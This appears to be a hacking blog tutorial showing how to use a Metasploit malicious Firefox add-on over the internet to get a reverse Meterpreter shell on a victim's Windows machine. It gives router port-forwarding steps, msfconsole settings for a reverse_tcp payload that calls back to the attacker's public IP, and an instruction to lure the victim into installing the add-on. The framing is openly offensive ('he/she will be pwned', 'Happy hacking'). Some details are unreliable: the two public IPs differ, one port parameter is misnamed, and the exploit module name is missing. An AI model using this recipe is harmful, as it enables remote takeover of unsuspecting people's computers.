Metasploit has basically two type of exploits included in its database which are remote exploits and client side attacks.
Well in this tutorial, i will show you how to use metasploit's bootstrapped firefox addon over WAN (wide area network) or Internet.
- Router (With Port Forwarding Support)
- Metasploit Framework
I will use teamviewer to show you remote machine's ip and activities status.
Attacker's Public IP: 220.127.116.11
Attacker's Internal IP: 192.168.1.7
Attacker's Payload's LPORT: 7777
Victims IP: X.X.X.X
Forward following two ports for Attacker's internal IP which is 192.168.1.7:
- webserver port which is 8080 in my case ..in metasploit this defined by SRVPORT parameter
- payload port which is 7777 is in my case .. in metasploit it is defined by LHOST parameter
Now start msfconsole and use following exploit:
use your public IP for LHOST parameter while remaining all parameters will get internal IP. Like this:
set srvhost 192.168.1.7
set srvport 8080
set uripath /
set payload windows/meterpreter/reverse_tcp
set lhost 18.104.22.168 set lport 7777
Now send this server's address to victim:
When victim will run this addon after installation, he/she will be pwned :)
You will get a reverse meterpreter session. Happy hacking :)
Watch Video Tutorial:
If you feel some trouble while following tutorial you may ask me in comments.